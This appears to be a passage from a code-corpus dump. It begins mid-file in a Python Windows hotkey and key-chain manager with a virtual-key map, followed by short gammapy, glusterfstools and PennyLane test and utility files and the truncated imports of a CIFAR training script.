Certain keys map to actions.\n\n All keys are simple (straight up keys; modifiers are considered keys).\n One key per action.\n \"\"\"\n def __init__(self, key_commands=None):\n self.__keys = {}\n\n if key_commands is not None:\n self.set_key_actions(key_commands)\n\n def set_key_actions(self, actions):\n assert isinstance(actions, dict)\n # FIXME use a dict instead\n\n # TODO in the future we may allow \"shift+left\" type keys here.\n # The implementation in key_action would just check the _MODIFIERS\n # state.\n new_key_actions = {}\n for key, action in actions.items():\n assert isinstance(action, list) or isinstance(action, tuple)\n action = tuple(action)\n key = key.strip().lower()\n if key in VK_ALIASES:\n for k in VK_ALIASES[key]:\n if k in MODIFIERS:\n # TODO better error / warning\n # Note use of user's value \"key\", rather than internal \"k\"\n print(\"CONFIG ERROR: Simple keys are not allowed to be modifiers: {0}\".format(key))\n elif k in STR_VK_MAP:\n # print(\"DEBUG KeyOverride: assigning {0} = `{1}`\".format(hex(STR_VK_MAP[k]), action))\n new_key_actions[STR_VK_MAP[k]] = action\n else:\n # TODO better error / warning\n print(\"ERROR IN SETUP: alias {0} not in vk map\".format(k))\n elif key in MODIFIERS:\n # TODO better error / warning\n print(\"CONFIG ERROR: Simple keys are not allowed to be modifiers: {0}\".format(key))\n elif key in STR_VK_MAP:\n new_key_actions[STR_VK_MAP[key]] = action\n else:\n # TODO better error / warning\n print(\"CONFIG ERROR: Simple key not a known key: {0}\".format(key))\n self.__keys = new_key_actions\n\n def reset(self):\n pass\n\n def key_action(self, vk_code, is_down):\n if vk_code in _MODIFIER_KEYS:\n # Ignore all modifier keys, so the \"release\" from a mode switch works right.\n # This ties in with modifiers not allowed as simple keys.\n return IGNORED\n if not is_down and vk_code in self.__keys:\n return self.__keys[vk_code]\n # Prevent all other keys from working\n return ACTION_PENDING\n\n\nclass HotKeyChain(object):\n \"\"\"\n Takes a keypress, and manages the state of the keys.\n It stores a list of key chains to action pairs.\n\n There should be one of these per system \"mode\".\n \"\"\"\n\n def __init__(self, chain_commands=None):\n self.__combos = []\n\n # The modifiers which are down and associated with the active combos\n self.__active_modifiers = []\n\n # The previous key in the combo chain; we're waiting for it to be off.\n self.__active_key = None\n\n # The active combo chains. Index 0 in each item is the remaining list\n # of key down actions to look for ([0] meaning the next one). Index 1\n # in each item is the command to return.\n self.__active_combos = []\n\n # Set to True to prevent the OS shell from using the \"windows\" key.\n self.block_win_key = False\n\n if chain_commands is not None:\n self.set_key_chains(chain_commands)\n\n def set_key_chains(self, chain_commands):\n assert isinstance(chain_commands, dict)\n\n combos = []\n for key_chain, command in chain_commands.items():\n assert isinstance(command, list) or isinstance(command, tuple)\n keys = parse_combo_str(key_chain)\n if len(keys) > 0:\n # We store modifiers a little differently.\n # Rather than having a list of lists, which must be\n # carefully examined, we instead construct the\n # permutations of the keys, and store each of those as\n # their own combo.\n permutation_keys = []\n _key_permutations(keys[0], 0, [], permutation_keys)\n for perm in permutation_keys:\n # print(\"DEBUG Combo {0} + {1} => {2}\".format(perm, keys[1:], command))\n combos.append((perm, keys[1:], tuple(command)))\n\n # Change the variable in a single command.\n self.__combos = combos\n self.reset()\n\n def reset(self):\n self.__active_combos = []\n self.__active_modifiers = []\n self.__active_key = None\n\n def key_action(self, vk_code, is_down):\n \"\"\"\n\n :param is_down:\n :param vk_code:\n :return: IGNORED if the key should be passed through,\n ACTION_PENDING if the key should be blocked from passing to\n another application, but does not complete an action, or\n a list of the action to run.\n \"\"\"\n if _MODIFIERS == self.__active_modifiers:\n if self.__active_key is None or not _CURRENT_KEY_STATE[self.__active_key]:\n # The previous key is no longer down.\n self.__active_key = None\n\n next_combos = []\n for ac in self.__active_combos:\n if vk_code in ac[0][0]:\n ac[0].pop(0)\n if len(ac[0]) <= 0:\n # We have our key\n command = ac[1]\n self.reset()\n # print(\"DEBUG keys generated command {0}\".format(command))\n return command\n next_combos.append(ac)\n if len(next_combos) > 0:\n self.__active_key = vk_code\n self.__active_combos = next_combos\n return ACTION_PENDING\n elif is_down:\n # A new key was pressed, which isn't a key in a pending\n # combo. Reset our hot keys, and return an ignored.\n self.reset()\n # else, the previous active key is still down; wait for it\n # to come up.\n else:\n # Discover which combo matches the modifiers.\n self.reset()\n new_active = []\n for combo in self.__combos:\n if combo[0] == _MODIFIERS:\n new_active.append((list(combo[1]), combo[2]))\n if len(new_active) > 0:\n self.__active_key = None\n self.__active_combos = new_active\n self.__active_modifiers = set(_MODIFIERS)\n # We still pass on the modifiers to the OS, just in case it's not\n # a match.\n\n if self.block_win_key and vk_code in _WIN_KEYS:\n return ACTION_PENDING\n return IGNORED\n\n\ndef parse_combo_str(chain_description):\n \"\"\"\n Special compact form of the string. For each key combo part,\n we make a \"string\" of the only VK codes that must be \"down\" in\n order to trigger the next part of the chain.\n\n The format is \"primary + primary + ... + key, key, key, ...\"\n\n :param chain_description:\n :return: list of aliased combo lists. So, the return will be\n [primary, key1, key2, ...], where \"primary\" are the primary\n keys that must be pressed through the whole action. Key1 and\n key2 (and so on) are the keys that must be pressed and released\n in order (the last key will respond on key down). Each key\n in the list is itself a list of alternate keys.\n \"\"\"\n assert isinstance(chain_description, str)\n\n key_parts = chain_description.split(\",\")\n # Parse the primary first. These are separated by \"+\".\n # The last key in the list is the \"non-always-down\" key,\n # meaning it's the first in the key chain.\n primary_list = []\n primary_keys = key_parts[0].split(\"+\")\n secondary_keys = [primary_keys[-1]]\n secondary_keys.extend(key_parts[1:])\n for key_text in primary_keys[:-1]:\n primary_key = []\n key_text = key_text.strip().lower()\n if key_text in VK_ALIASES:\n for k in VK_ALIASES[key_text]:\n if k in STR_VK_MAP:\n if k in MODIFIERS:\n primary_key.append(STR_VK_MAP[k])\n else:\n # TODO better error / warning\n print(\"CONFIG ERROR: Primary key not a modifier {0}\".format(k))\n else:\n print(\"ERROR IN SETUP: alias {0} not in vk map\".format(k))\n elif key_text in STR_VK_MAP:\n if key_text in MODIFIERS:\n primary_key.append(STR_VK_MAP[key_text])\n else:\n # TODO better error / warning\n print(\"CONFIG ERROR: Primary key not a modifier {0}\".format(key_text))\n else:\n # TODO better error / warning\n print(\"CONFIG ERROR: unknown key code [{0}]\".format(key_text))\n if len(primary_key) > 0:\n primary_list.append(primary_key)\n\n chain = [primary_list]\n\n for key_text in secondary_keys:\n key = []\n key_text = key_text.strip().lower()\n if key_text in VK_ALIASES:\n for k in VK_ALIASES[key_text]:\n if k in STR_VK_MAP:\n if k in MODIFIERS:\n # TODO better error / warning\n print(\"CONFIG ERROR: secondary key is a modifier {0}\".format(k))\n else:\n key.append(STR_VK_MAP[k])\n else:\n print(\"ERROR IN SETUP: alias {0} not in vk map\".format(k))\n elif key_text in STR_VK_MAP:\n if key_text in MODIFIERS:\n # TODO better error / warning\n print(\"CONFIG ERROR: secondary key is a modifier {0}\".format(key_text))\n else:\n key.append(STR_VK_MAP[key_text])\n else:\n # TODO better error / warning\n print(\"CONFIG ERROR: unknown key code {0}\".format(key_text))\n if len(key) > 0:\n chain.append(key)\n return chain\n\n\ndef _key_permutations(key_alt_list, alt_index, current_list, final_list):\n \"\"\"\n Takes a list of key alternates ([ [k1a, k1b, ...], [k2a, k2b, ...], ...])\n and transforms this into the\n\n :param key_alt_list:\n :return:\n \"\"\"\n for key in key_alt_list[alt_index]:\n next_list = list(current_list)\n next_list.append(key)\n if alt_index + 1 >= len(key_alt_list):\n final_list.append(set(next_list))\n else:\n _key_permutations(key_alt_list, alt_index + 1, next_list, final_list)\n\n\ndef vk_to_names(vk):\n maps = []\n for vk_str, code in STR_VK_MAP.items():\n # There are multiple mappings; return them all.\n if code == vk:\n maps.append(vk_str)\n if len(maps) <= 0:\n maps.append(\"#{0}\".format(hex(vk)))\n return maps\n\n\ndef is_vk_modifier(vk):\n return vk in _MODIFIER_KEYS\n\n\n# Built-in alias VK keys for user-specified keys\nVK_ALIASES = {\n \"win\": [\"lwin\", \"rwin\"],\n \"shift\": [\"lshift\", \"rshift\"],\n \"control\": [\"lcontrol\", \"rcontrol\"],\n \"alt\": [\"lalt\", \"ralt\"],\n \"menu\": [\"lmenu\", \"rmenu\"],\n}\n\n\n# Set of all recognized modifiers\nMODIFIERS = {\n \"shift\",\n \"lshift\",\n \"rshift\",\n \"control\",\n \"ctrl\",\n \"lcontrol\",\n \"lctrl\",\n \"rcontrol\",\n \"rctrl\",\n \"alt\",\n \"lalt\",\n \"ralt\",\n \"lwin\",\n \"rwin\",\n \"lmenu\",\n \"rmenu\",\n \"apps\",\n \"caps-lock\",\n}\n\n# https://msdn.microsoft.com/en-us/library/windows/desktop/dd375731(v=vs.85).aspx\nSTR_VK_MAP = {\n \"lmb\": 0x01, # VK_LBUTTON Left mouse button\n \"rmb\": 0x02, # VK_RBUTTON Right mouse button\n \"break\": 0x03, # VK_CANCEL Control-break processing\n \"mmb\": 0x04, # VK_MBUTTON Middle mouse button (three-button mouse)\n \"x1mb\": 0x05, # VK_XBUTTON1 X1 mouse button\n \"x2mb\": 0x06, # VK_XBUTTON2 X2 mouse button\n \"x3mb\": 0x07, # - Undefined\n \"back\": 0x08, # VK_BACK BACKSPACE key\n \"backspace\": 0x08, # VK_BACK BACKSPACE key\n \"tab\": 0x09, # VK_TAB TAB key\n # - 0x0A-0B Reserved\n \"clear\": 0x0C, # VK_CLEAR CLEAR key\n \"return\": 0x0D, # VK_RETURN ENTER key\n \"enter\": 0x0D, # VK_RETURN ENTER key\n \"cr\": 0x0D, # VK_RETURN ENTER key\n \"lf\": 0x0D, # VK_RETURN ENTER key\n # - 0x0E-0F Undefined\n\n # These VK keys don't seem to get generated by the global key handler;\n # instead, the more low-level (lcontrol, rcontrol, etc) ones are.\n \"shift\": 0x10, # VK_SHIFT SHIFT key\n \"sft\": 0x10, # VK_SHIFT SHIFT key\n \"control\": 0x11, # VK_CONTROL CTRL key\n \"ctrl\": 0x11, # VK_CONTROL CTRL key\n \"menu\": 0x12, # VK_MENU ALT key\n \"alt\": 0x12, # VK_MENU ALT key\n\n \"pause\": 0x13, # VK_PAUSE PAUSE key\n \"caps-lock\": 0x14, # VK_CAPITAL CAPS LOCK key\n \"kana\": 0x15, # VK_KANA IME Kana mode\n \"hanguel\": 0x15, # VK_HANGUEL IME Hanguel mode (maintained for compatibility; use VK_HANGUL)\n \"hangul\": 0x15, # VK_HANGUL IME Hangul mode\n # - 0x16 Undefined\n \"junja\": 0x17, # VK_JUNJA IME Junja mode\n \"final\": 0x18, # VK_FINAL IME final mode\n \"hanja\": 0x19, # VK_HANJA IME Hanja mode\n \"kanji\": 0x19, # VK_KANJI IME Kanji mode\n # 0x1A - Undefined\n \"escape\": 0x1B, # VK_ESCAPE ESC key\n \"esc\": 0x1B, # VK_ESCAPE ESC key\n \"convert\": 0x1C, # VK_CONVERT IME convert\n \"nonconvert\": 0x1D, # VK_NONCONVERT IME nonconvert\n \"accept\": 0x1E, # VK_ACCEPT IME accept\n \"modechange\": 0x1F, # VK_MODECHANGE IME mode change request\n \"space\": 0x20, # VK_SPACE SPACEBAR\n \"prior\": 0x21, # VK_PRIOR PAGE UP key\n \"pgup\": 0x21, # VK_PRIOR PAGE UP key\n \"pageup\": 0x21, # VK_PRIOR PAGE UP key\n \"next\": 0x22, # VK_NEXT PAGE DOWN key\n \"pgdn\": 0x22, # VK_NEXT PAGE DOWN key\n \"pagedown\": 0x22, # VK_NEXT PAGE DOWN key\n \"end\": 0x23, # VK_END END key\n \"home\": 0x24, # VK_HOME HOME key\n \"left\": 0x25, # VK_LEFT LEFT ARROW key\n \"up\": 0x26, # VK_UP UP ARROW key\n \"right\": 0x27, # VK_RIGHT RIGHT ARROW key\n \"down\": 0x28, # VK_DOWN DOWN ARROW key\n \"select\": 0x29, # VK_SELECT SELECT key\n \"print\": 0x2A, # VK_PRINT PRINT key\n \"execute\": 0x2B, # VK_EXECUTE EXECUTE key\n \"snapshot\": 0x2C, # VK_SNAPSHOT PRINT SCREEN key\n \"insert\": 0x2D, # VK_INSERT INS key\n \"delete\": 0x2E, # VK_DELETE DEL key\n \"del\": 0x2E, # VK_DELETE DEL key\n \"help\": 0x2F, # VK_HELP HELP key\n \"lwin\": 0x5B, # VK_LWIN Left Windows key (Natural keyboard)\n \"rwin\": 0x5C, # VK_RWIN Right Windows key (Natural keyboard)\n \"apps\": 0x5D, # VK_APPS Applications key (Natural keyboard)\n # 0x5E - Reserved\n \"sleep\": 0x5F, # VK_SLEEP Computer Sleep key\n \"numpad0\": 0x60, # VK_NUMPAD0 Numeric keypad 0 key\n \"numpad1\": 0x61, # VK_NUMPAD1 Numeric keypad 1 key\n \"numpad2\": 0x62, # VK_NUMPAD2 Numeric keypad 2 key\n \"numpad3\": 0x63, # VK_NUMPAD3 Numeric keypad 3 key\n \"numpad4\": 0x64, # VK_NUMPAD4 Numeric keypad 4 key\n \"numpad5\": 0x65, # VK_NUMPAD5 Numeric keypad 5 key\n \"numpad6\": 0x66, # VK_NUMPAD6 Numeric keypad 6 key\n \"numpad7\": 0x67, # VK_NUMPAD7 Numeric keypad 7 key\n \"numpad8\": 0x68, # VK_NUMPAD8 Numeric keypad 8 key\n \"numpad9\": 0x69, # VK_NUMPAD9 Numeric keypad 9 key\n \"multiply\": 0x6A, # VK_MULTIPLY Multiply key\n \"add\": 0x6B, # VK_ADD Add key\n \"separator\": 0x6C, # VK_SEPARATOR Separator key\n \"subtract\": 0x6D, # VK_SUBTRACT Subtract key\n \"decimal\": 0x6E, # VK_DECIMAL Decimal key\n \"divide\": 0x6F, # VK_DIVIDE Divide key\n \"f1\": 0x70, # VK_F1 F1 key\n \"f2\": 0x71, # VK_F2 F2 key\n \"f3\": 0x72, # VK_F3 F3 key\n \"f4\": 0x73, # VK_F4 F4 key\n \"f5\": 0x74, # VK_F5 F5 key\n \"f6\": 0x75, # VK_F6 F6 key\n \"f7\": 0x76, # VK_F7 F7 key\n \"f8\": 0x77, # VK_F8 F8 key\n \"f9\": 0x78, # VK_F9 F9 key\n \"f10\": 0x79, # VK_F10 F10 key\n \"f11\": 0x7A, # VK_F11 F11 key\n \"f12\": 0x7B, # VK_F12 F12 key\n \"f13\": 0x7C, # VK_F13 F13 key\n \"f14\": 0x7D, # VK_F14 F14 key\n \"f15\": 0x7E, # VK_F15 F15 key\n \"f16\": 0x7F, # VK_F16 F16 key\n \"f17\": 0x80, # VK_F17 F17 key\n \"f18\": 0x81, # VK_F18 F18 key\n \"f19\": 0x82, # VK_F19 F19 key\n \"f20\": 0x83, # VK_F20 F20 key\n \"f21\": 0x84, # VK_F21 F21 key\n \"f22\": 0x85, # VK_F22 F22 key\n \"f23\": 0x86, # VK_F23 F23 key\n \"f24\": 0x87, # VK_F24 F24 key\n # 0x88-8F - Unassigned\n \"numlock\": 0x90, # VK_NUMLOCK NUM LOCK key\n \"scroll\": 0x91, # VK_SCROLL SCROLL LOCK key\n # 0x92-96 - OEM specific\n # 0x97-9F - Unassigned\n \"lshift\": 0xA0, # VK_LSHIFT Left SHIFT key\n \"rshift\": 0xA1, # VK_RSHIFT Right SHIFT key\n \"lcontrol\": 0xA2, # VK_LCONTROL Left CONTROL key\n \"lctrl\": 0xA2, # VK_LCONTROL Left CONTROL key\n \"rcontrol\": 0xA3, # VK_RCONTROL Right CONTROL key\n \"rctrl\": 0xA3, # VK_RCONTROL Right CONTROL key\n \"lmenu\": 0xA4, # VK_LMENU Left MENU key\n \"lalt\": 0xA4, # VK_LMENU Left MENU key\n \"rmenu\": 0xA5, # VK_RMENU Right MENU key\n \"ralt\": 0xA5, # VK_RMENU Right MENU key\n \"browser-back\": 0xA6, # VK_BROWSER_BACK Browser Back key\n \"browser-forward\": 0xA7, # VK_BROWSER_FORWARD Browser Forward key\n \"browser-refresh\": 0xA8, # VK_BROWSER_REFRESH Browser Refresh key\n \"browser-stop\": 0xA9, # VK_BROWSER_STOP Browser Stop key\n \"browser-search\": 0xAA, # VK_BROWSER_SEARCH Browser Search key\n \"browser-favorites\": 0xAB, # VK_BROWSER_FAVORITES Browser Favorites key\n \"browser-home\": 0xAC, # VK_BROWSER_HOME Browser Start and Home key\n \"volume-mute\": 0xAD, # VK_VOLUME_MUTE Volume Mute key\n \"volume-down\": 0xAE, # VK_VOLUME_DOWN Volume Down key\n \"volume-up\": 0xAF, # VK_VOLUME_UP Volume Up key\n \"media-next-track\": 0xB0, # VK_MEDIA_NEXT_TRACK Next Track key\n \"media-prev-track\": 0xB1, # VK_MEDIA_PREV_TRACK Previous Track key\n \"media-stop\": 0xB2, # VK_MEDIA_STOP Stop Media key\n \"media-play-pause\": 0xB3, # VK_MEDIA_PLAY_PAUSE Play/Pause Media key\n \"launch-mail\": 0xB4, # VK_LAUNCH_MAIL Start Mail key\n \"launch-media-select\": 0xB5, # VK_LAUNCH_MEDIA_SELECT Select Media key\n \"launch-app1\": 0xB6, # VK_LAUNCH_APP1 Start Application 1 key\n \"launch-app2\": 0xB7, # VK_LAUNCH_APP2 Start Application 2 key\n # 0xB8-B9 - Reserved\n \"oem_1\": 0xBA, # VK_OEM_1 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the ';:' key\n \":\": 0xBA,\n \";\": 0xBA,\n \"colon\": 0xBA,\n \"oem_plus\": 0xBB, # VK_OEM_PLUS For any country/region, the '+' key\n \"plus\": 0xBB,\n \"oem_comma\": 0xBC, # VK_OEM_COMMA For any country/region, the ',' key\n \"comma\": 0xBC,\n \",\": 0xBC,\n \"<\": 0xBC,\n \"oem_minus\": 0xBD, # VK_OEM_MINUS For any country/region, the '-' key\n \"minus\": 0xBD,\n \"oem_period\": 0xBE, # VK_OEM_PERIOD For any country/region, the '.' key\n \".\": 0xBE,\n \"period\": 0xBE,\n \">\": 0xBE,\n \"oem_2\": 0xBF, # VK_OEM_2 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the '/?' key\n \"/\": 0xBF,\n \"slash\": 0xBF,\n \"?\": 0xBF,\n \"question\": 0xBF,\n \"question-mark\": 0xBF,\n \"oem2\": 0xBF,\n \"oem_3\": 0xC0, # VK_OEM_3 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the '`~' key\n \"oem3\": 0xC0,\n \"~\": 0xC0,\n \"tilde\": 0xC0,\n \"twiddle\": 0xC0,\n \"`\": 0xC0,\n \"back-tick\": 0xC0,\n # 0xC1-D7 - Reserved\n # 0xD8-DA - Unassigned\n \"oem_4\": 0xDB, # VK_OEM_4 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the '[{' key\n \"oem4\": 0xDB,\n \"[\": 0xDB,\n \"{\": 0xDB,\n \"left-bracket\": 0xDB,\n \"oem_5\": 0xDC, # VK_OEM_5 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the '\\|' key\n \"oem5\": 0xDC,\n \"|\": 0xDC,\n \"\\\\\": 0xDC,\n \"pipe\": 0xDC,\n \"backslash\": 0xDC,\n \"oem_6\": 0xDD, # VK_OEM_6 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the ']}' key\n \"oem6\": 0xDD,\n \"]\": 0xDD,\n \"}\": 0xDD,\n \"right-bracket\": 0xDD,\n \"oem_7\": 0xDE, # VK_OEM_7 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard,\n # the 'single-quote/double-quote' key\n \"oem7\": 0xDE,\n '\"': 0xDE,\n \"'\": 0xDE,\n \"quote\": 0xDE,\n \"tick\": 0xDE,\n \"oem_8\": 0xDF, # VK_OEM_8 Used for miscellaneous characters; it can vary by keyboard.\n \"oem8\": 0xDF,\n # 0xE0 - Reserved\n # 0xE1 - OEM specific\n \"oem_102\": 0xE2, # VK_OEM_102 Either the angle bracket key or the backslash key on\n # the RT 102-key keyboard\n \"oem102\": 0xE2,\n # 0xE3-E4 - OEM specific\n \"processkey\": 0xE5, # VK_PROCESSKEY IME PROCESS key\n # 0xE6 - OEM specific\n \"packet\": 0xE7, # VK_PACKET Used to pass Unicode characters as if they were\n # keystrokes. The VK_PACKET key is the low word of a 32-bit Virtual\n # Key value used for non-keyboard input methods. For more\n # information, see Remark in KEYBDINPUT, SendInput, WM_KEYDOWN, and WM_KEYUP\n # 0xE8 - Unassigned\n # 0xE9-F5 - OEM specific\n \"attn\": 0xF6, # VK_ATTN Attn key\n \"crsel\": 0xF7, # VK_CRSEL CrSel key\n \"exsel\": 0xF8, # VK_EXSEL ExSel key\n \"ereof\": 0xF9, # VK_EREOF Erase EOF key\n \"play\": 0xFA, # VK_PLAY Play key\n \"zoom\": 0xFB, # VK_ZOOM Zoom key\n \"noname\": 0xFC, # VK_NONAME Reserved\n \"pa1\": 0xFD, # VK_PA1 PA1 key\n \"oem_clear\": 0xFE, # VK_OEM_CLEAR Clear key\n # 0x3A-40 - Undefined\n \"0\": 0x30, # 0 key\n \"1\": 0x31, # 1 key\n \"2\": 0x32, # 2 key\n \"3\": 0x33, # 3 key\n \"4\": 0x34, # 4 key\n \"5\": 0x35, # 5 key\n \"6\": 0x36, # 6 key\n \"7\": 0x37, # 7 key\n \"8\": 0x38, # 8 key\n \"9\": 0x39, # 9 key\n \"a\": 0x41, # A key\n \"b\": 0x42, # B key\n \"c\": 0x43, # C key\n \"d\": 0x44, # D key\n \"e\": 0x45, # E key\n \"f\": 0x46, # F key\n \"g\": 0x47, # G key\n \"h\": 0x48, # H key\n \"i\": 0x49, # I key\n \"j\": 0x4A, # J key\n \"k\": 0x4B, # K key\n \"l\": 0x4C, # L key\n \"m\": 0x4D, # M key\n \"n\": 0x4E, # N key\n \"o\": 0x4F, # O key\n \"p\": 0x50, # P key\n \"q\": 0x51, # Q key\n \"r\": 0x52, # R key\n \"s\": 0x53, # S key\n \"t\": 0x54, # T key\n \"u\": 0x55, # U key\n \"v\": 0x56, # V key\n \"w\": 0x57, # W key\n \"x\": 0x58, # X key\n \"y\": 0x59, # Y key\n \"z\": 0x5A, # Z key\n}\n\n_MODIFIER_KEYS = set()\nfor __k in MODIFIERS:\n _MODIFIER_KEYS.add(STR_VK_MAP[__k])\n\n_WIN_KEYS = [STR_VK_MAP['lwin'], STR_VK_MAP['rwin']]\n\n\nSPECIAL_MODIFIER_CHECK_VKEY_CODES = (\n STR_VK_MAP['lwin'], STR_VK_MAP['rwin']\n)\n"} {"ext": "py", "sha": "1a3012a0f455705472b60991f832c2726af097fd", "content": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\nimport pytest\nimport astropy.units as u\nfrom ....utils.testing import assert_quantity_allclose, requires_data\nfrom .. import PrimaryFlux\n\n\n@requires_data(\"gammapy-data\")\ndef test_primary_flux():\n with pytest.raises(ValueError):\n PrimaryFlux(channel=\"Spam\", mDM=1 * u.TeV)\n\n primflux = PrimaryFlux(channel=\"W\", mDM=1 * u.TeV)\n actual = primflux.table_model(500 * u.GeV)\n desired = 9.328234e-05 / u.GeV\n assert_quantity_allclose(actual, desired)\n"} {"ext": "py", "sha": "1a30130f642b10e1d40939478b8141a9ebcedc60", "content": "# -*- coding: utf-8 -*-\n\"\"\"\n glusterfstools.volumefilters\n\n :copyright: (c) 2013, 2014 by Aravinda VK\n :license: BSD, see LICENSE for more details.\n\"\"\"\n\nfrom functools import wraps\nimport re\n\n_volume_filters = {}\n\n\ndef filter(name):\n def filter_decorator(f):\n @wraps(f)\n def wrapper(*args, **kwds):\n return f(*args, **kwds)\n\n global _volume_filters\n _volume_filters[name] = wrapper\n return wrapper\n return filter_decorator\n\n\n@filter(\"name\")\ndef name_filter(vols, value):\n def is_match(vol, value):\n if value in ['', 'all'] or \\\n vol[\"name\"].lower() == value.lower().strip() or \\\n re.search(value, vol[\"name\"]):\n return True\n else:\n return False\n\n return [v for v in vols if is_match(v, value)]\n\n\n@filter(\"status\")\ndef status_filter(vols, value):\n def is_match(vol, value):\n if value in ['', 'all'] or \\\n vol[\"status\"].lower() == value.lower().strip():\n return True\n else:\n return False\n\n return [v for v in vols if is_match(v, value)]\n\n\n@filter(\"type\")\ndef type_filter(vols, value):\n def is_match(vol, value):\n if value in ['', 'all'] or \\\n vol[\"type\"].lower() == value.lower() or \\\n re.search(value, vol[\"type\"], re.I):\n return True\n else:\n return False\n\n return [v for v in vols if is_match(v, value)]\n\n\n@filter(\"volumewithbrick\")\ndef volumewithbrick_filter(vols, value):\n def is_match(vol, value):\n for brick in vol[\"bricks\"]:\n if value in ['', 'all'] or \\\n brick.lower() == value.lower() or \\\n re.search(value, brick, re.I):\n return True\n\n # If no single brick matching the query\n return False\n\n return [v for v in vols if is_match(v, value)]\n\n\ndef get():\n return _volume_filters\n"} {"ext": "py", "sha": "1a301448b33056fc64fe89f0c4136b91c4fc9fa8", "content": "# Copyright 2018-2020 Xanadu Quantum Technologies Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nPytest configuration file for PennyLane test suite.\n\"\"\"\nimport os\n\nimport pytest\nimport numpy as np\n\nimport pennylane as qml\nfrom pennylane.plugins import DefaultGaussian\n\n# defaults\nTOL = 1e-3\nTF_TOL = 2e-2\n\nclass DummyDevice(DefaultGaussian):\n \"\"\"Dummy device to allow Kerr operations\"\"\"\n _operation_map = DefaultGaussian._operation_map.copy()\n _operation_map['Kerr'] = lambda *x, **y: np.identity(2)\n\n\n@pytest.fixture(scope=\"session\")\ndef tol():\n \"\"\"Numerical tolerance for equality tests.\"\"\"\n return float(os.environ.get(\"TOL\", TOL))\n\n@pytest.fixture(scope=\"session\")\ndef tf_tol():\n \"\"\"Numerical tolerance for equality tests.\"\"\"\n return float(os.environ.get(\"TF_TOL\", TF_TOL))\n\n@pytest.fixture(scope=\"session\", params=[1, 2])\ndef n_layers(request):\n \"\"\"Number of layers.\"\"\"\n return request.param\n\n\n@pytest.fixture(scope=\"session\", params=[2, 3])\ndef n_subsystems(request):\n \"\"\"Number of qubits or qumodes.\"\"\"\n return request.param\n\n\n@pytest.fixture(scope=\"session\")\ndef qubit_device(n_subsystems):\n return qml.device('default.qubit', wires=n_subsystems)\n\n\n@pytest.fixture(scope=\"function\")\ndef qubit_device_1_wire():\n return qml.device('default.qubit', wires=1)\n\n\n@pytest.fixture(scope=\"function\")\ndef qubit_device_2_wires():\n return qml.device('default.qubit', wires=2)\n\n\n@pytest.fixture(scope=\"function\")\ndef qubit_device_3_wires():\n return qml.device('default.qubit', wires=3)\n\n\n@pytest.fixture(scope=\"session\")\ndef tensornet_device(n_subsystems):\n return qml.device('default.tensor', wires=n_subsystems)\n\n\n@pytest.fixture(scope=\"function\")\ndef tensornet_device_1_wire():\n return qml.device('default.tensor', wires=1)\n\n\n@pytest.fixture(scope=\"function\")\ndef tensornet_device_2_wires():\n return qml.device('default.tensor', wires=2)\n\n\n@pytest.fixture(scope=\"function\")\ndef tensornet_device_3_wires():\n return qml.device('default.tensor', wires=3)\n\n\n@pytest.fixture(scope=\"session\")\ndef gaussian_device(n_subsystems):\n \"\"\"Number of qubits or modes.\"\"\"\n return DummyDevice(wires=n_subsystems)\n\n@pytest.fixture(scope=\"session\")\ndef gaussian_dummy():\n \"\"\"Number of qubits or modes.\"\"\"\n return DummyDevice\n\n@pytest.fixture(scope=\"session\")\ndef gaussian_device_2_wires():\n \"\"\"A 2-mode Gaussian device.\"\"\"\n return DummyDevice(wires=2)\n\n\n@pytest.fixture(scope=\"session\")\ndef gaussian_device_4modes():\n \"\"\"A 4 mode Gaussian device.\"\"\"\n return DummyDevice(wires=4)\n\n\n@pytest.fixture(scope='session')\ndef torch_support():\n \"\"\"Boolean fixture for PyTorch support\"\"\"\n try:\n import torch\n from torch.autograd import Variable\n torch_support = True\n except ImportError as e:\n torch_support = False\n\n return torch_support\n\n\n@pytest.fixture()\ndef skip_if_no_torch_support(torch_support):\n if not torch_support:\n pytest.skip(\"Skipped, no torch support\")\n\n\n@pytest.fixture(scope='module')\ndef tf_support():\n \"\"\"Boolean fixture for TensorFlow support\"\"\"\n try:\n import tensorflow as tf\n tf_support = True\n\n except ImportError as e:\n tf_support = False\n\n return tf_support\n\n\n@pytest.fixture()\ndef skip_if_no_tf_support(tf_support):\n if not tf_support:\n pytest.skip(\"Skipped, no tf support\")\n\n\n@pytest.fixture(scope=\"module\",\n params=[1, 2, 3])\ndef seed(request):\n \"\"\"Different seeds.\"\"\"\n return request.param\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_device(monkeypatch):\n \"\"\"A mock instance of the abstract Device class\"\"\"\n\n with monkeypatch.context() as m:\n dev = qml.Device\n m.setattr(dev, '__abstractmethods__', frozenset())\n m.setattr(dev, 'short_name', 'mock_device')\n m.setattr(dev, 'capabilities', lambda cls: {\"model\": \"qubit\"})\n yield qml.Device(wires=2)\n\n@pytest.fixture\ndef tear_down_hermitian():\n yield None\n qml.Hermitian._eigs = {}\n\n"} {"ext": "py", "sha": "1a30151df25ee8d440dce68656b0ceb7eb16edb0", "content": "from data.cifar import Cifar\nfrom utility.step_lr import StepLR\nfrom utility.initialize import initialize\nfrom utility.log import Log\nfrom utility.lognolr import LogNoLR\nfrom model import *\nimport time\nfrom model.preact_resnet import *\nfrom model.smooth_cross_entropy import smooth_crossentropy\nfrom model.wideresnet import WideResNet\nfrom model.resnet import *\nfrom model.vgg import *\nfrom sam import SAM\nimport argparse\nimport torch\nimport sys\nimport os\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader\nfrom torch.optim.lr_scheduler import CosineAnnealingLR, 